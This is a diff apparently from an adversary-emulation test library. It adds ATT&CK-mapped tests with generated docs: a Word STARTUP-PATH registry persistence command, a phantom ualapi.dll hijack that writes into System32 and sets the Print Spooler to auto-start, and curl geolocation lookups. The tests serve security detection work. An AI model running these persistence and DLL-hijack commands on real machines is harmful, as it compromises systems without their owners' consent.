+          copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+          ren %APPDATA%\amsi.dll ualapi.dll
+          copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+          sc config Spooler start=auto
+        cleanup_command: |
+          del %windir%\System32\ualapi.dll
+          del %APPDATA%\ualapi.dll
+        name: command_prompt
+        elevation_required: true
  T1574.014:
    technique:
      modified: '2024-04-18T15:03:32.158Z'
@@ -37809,6 +37851,22 @@ privilege-escalation:
          Server\AddIns\TestDVCPlugin" /f
        name: command_prompt
        elevation_required: true
+    - name: Persistence using STARTUP-PATH in MS-WORD
+      auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
+      description: |-
+        When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
+        it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
+        The registry key can be abused to load malware from the mentioned path. Reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH
+          /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"
+          /f
+        cleanup_command: reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options
+          /v STARTUP-PATH /f
+        name: command_prompt
+        elevation_required: true
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -49674,6 +49732,27 @@ persistence:
          del %APPDATA%\WinAppXRT.dll
        name: command_prompt
        elevation_required: true
+    - name: Phantom Dll Hijacking - ualapi.dll
+      auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+      description: |
+        Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+        A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+        Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+        Print Spooler service is also configured to auto start. Reboot of system is required
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+          ren %APPDATA%\amsi.dll ualapi.dll
+          copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+          sc config Spooler start=auto
+        cleanup_command: |
+          del %windir%\System32\ualapi.dll
+          del %APPDATA%\ualapi.dll
+        name: command_prompt
+        elevation_required: true
  T1137.006:
    technique:
      x_mitre_platforms:
@@ -57358,6 +57437,22 @@ persistence:
          Server\AddIns\TestDVCPlugin" /f
        name: command_prompt
        elevation_required: true
+    - name: Persistence using STARTUP-PATH in MS-WORD
+      auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
+      description: |-
+        When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
+        it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
+        The registry key can be abused to load malware from the mentioned path. Reboot might be required.
+      supported_platforms:
+      - windows
+      executor:
+        command: reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH
+          /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent"
+          /f
+        cleanup_command: reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options
+          /v STARTUP-PATH /f
+        name: command_prompt
+        elevation_required: true
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -86048,7 +86143,43 @@ discovery:
      x_mitre_is_subtechnique: false
      spec_version: '2.1'
      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
+      identifier: T1614
+    atomic_tests:
+    - name: Get geolocation info through IP-Lookup services using curl Windows
+      auto_generated_guid: fe53e878-10a3-477b-963e-4367348f5af5
+      description: 'Get geolocation info through IP-Lookup services using curl Windows.
+        The default URL of the IP-Lookup service is https://ipinfo.io/. References:
+        https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        ip_lookup_url:
+          description: URL of the IP-Lookup service
+          type: url
+          default: https://ipinfo.io/
+        curl_path:
+          description: path to curl.exe
+          type: path
+          default: C:\Windows\System32\Curl.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Curl must be installed on system.
+
+          '
+        prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://curl.se/windows/dl-8.4.0_6/curl-8.4.0_6-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
+          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.4.0_6-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: "#{curl_path} -k #{ip_lookup_url}\n"
  T1518.001:
    technique:
      modified: '2024-04-16T00:15:53.303Z'
@@ -22,6 +22,8 @@ Since the execution can be proxied by an account with higher permissions, such a

 - [Atomic Test #7 - Persistence using automatic execution of custom DLL during RDP session](#atomic-test-7---persistence-using-automatic-execution-of-custom-dll-during-rdp-session)

+- [Atomic Test #8 - Persistence using STARTUP-PATH in MS-WORD](#atomic-test-8---persistence-using-startup-path-in-ms-word)
+

 <br/>

@@ -314,4 +316,38 @@ reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVC



+<br/>
+<br/>
+
+## Atomic Test #8 - Persistence using STARTUP-PATH in MS-WORD
+When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
+it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
+The registry key can be abused to load malware from the mentioned path. Reboot might be required.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f0027655-25ef-47b0-acaf-3d83d106156c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKCU\Software\Microsoft\Office\16.0\Word\Options" /v STARTUP-PATH /t REG_SZ /d "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Microsoft\Office\16.0\Word\Options /v STARTUP-PATH /f
+```
+
+
+
+
+
 <br/>
@@ -170,6 +170,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true
 - name: Persistence using STARTUP-PATH in MS-WORD
+  auto_generated_guid: f0027655-25ef-47b0-acaf-3d83d106156c
  description: |-
    When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\<version>\Word\Options\STARTUP-PATH and if it exists,
    it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
@@ -16,6 +16,8 @@ If a search order-vulnerable program is configured to run at a higher privilege

 - [Atomic Test #2 - Phantom Dll Hijacking - WinAppXRT.dll](#atomic-test-2---phantom-dll-hijacking---winappxrtdll)

+- [Atomic Test #3 - Phantom Dll Hijacking - ualapi.dll](#atomic-test-3---phantom-dll-hijacking---ualapidll)
+

 <br/>

@@ -95,4 +97,44 @@ del %APPDATA%\WinAppXRT.dll



+<br/>
+<br/>
+
+## Atomic Test #3 - Phantom Dll Hijacking - ualapi.dll
+Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
+A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
+
+Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to system32 folder for loading during system restart.
+Print Spooler service is also configured to auto start. Reboot of system is required
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5898902d-c5ad-479a-8545-6f5ab3cfc87f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
+ren %APPDATA%\amsi.dll ualapi.dll
+copy %APPDATA%\ualapi.dll %windir%\System32\ualapi.dll
+sc config Spooler start=auto
+```
+
+#### Cleanup Commands:
+```cmd
+del %windir%\System32\ualapi.dll
+del %APPDATA%\ualapi.dll
+```
+
+
+
+
+
 <br/>
@@ -43,6 +43,7 @@ atomic_tests:
    name: command_prompt
    elevation_required: true    
 - name: Phantom Dll Hijacking - ualapi.dll
+  auto_generated_guid: 5898902d-c5ad-479a-8545-6f5ab3cfc87f
  description: |
    Re-starting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded
    A malicious ualapi.dll placed in the System32 directory will lead to its execution whenever the system starts
@@ -0,0 +1,98 @@
+# T1614 - System Location Discovery
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1614)
+<blockquote>
+Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Get geolocation info through IP-Lookup services using curl Windows](#atomic-test-1---get-geolocation-info-through-ip-lookup-services-using-curl-windows)
+
+- [Atomic Test #2 - Get geolocation info through IP-Lookup services using curl freebsd, linux or macos](#atomic-test-2---get-geolocation-info-through-ip-lookup-services-using-curl-freebsd-linux-or-macos)
+
+
+<br/>
+
+## Atomic Test #1 - Get geolocation info through IP-Lookup services using curl Windows
+Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fe53e878-10a3-477b-963e-4367348f5af5
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ip_lookup_url | URL of the IP-Lookup service | url | https://ipinfo.io/|
+| curl_path | path to curl.exe | path | C:&#92;Windows&#92;System32&#92;Curl.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{curl_path} -k #{ip_lookup_url}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Curl must be installed on system.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{curl_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://curl.se/windows/dl-8.4.0_6/curl-8.4.0_6-win64-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
+Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.4.0_6-win64-mingw\bin\curl.exe" C:\Windows\System32\Curl.exe
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
+Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+
+**Supported Platforms:** macOS, Linux
+
+
+**auto_generated_guid:** 552b4db3-8850-412c-abce-ab5cc8a86604
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ip_lookup_url | URL of the IP-Lookup service | url | https://ipinfo.io/|
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+curl -k #{ip_lookup_url}
+```
+
+
+
+
+
+
+<br/>
@@ -2,6 +2,7 @@ attack_technique: T1614
 display_name: System Location Discovery 
 atomic_tests:
 - name: Get geolocation info through IP-Lookup services using curl Windows
+  auto_generated_guid: fe53e878-10a3-477b-963e-4367348f5af5
  description: |
    Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
  supported_platforms:
@@ -32,6 +33,7 @@ atomic_tests:
    command: |
      #{curl_path} -k #{ip_lookup_url}
 - name: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
+  auto_generated_guid: 552b4db3-8850-412c-abce-ab5cc8a86604
  description: |
    Get geolocation info through IP-Lookup services using curl Windows. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
  supported_platforms:
@@ -1669,3 +1669,7 @@ fdd45306-74f6-4ade-9a97-0a4895961228
 5510d22f-2595-4911-8456-4d630c978616
 70e13ef4-5a74-47e4-9d16-760b41b0e2db
 e0742e38-6efe-4dd4-ba5c-2078095b6156
+f0027655-25ef-47b0-acaf-3d83d106156c
+5898902d-c5ad-479a-8545-6f5ab3cfc87f
+fe53e878-10a3-477b-963e-4367348f5af5
+552b4db3-8850-412c-abce-ab5cc8a86604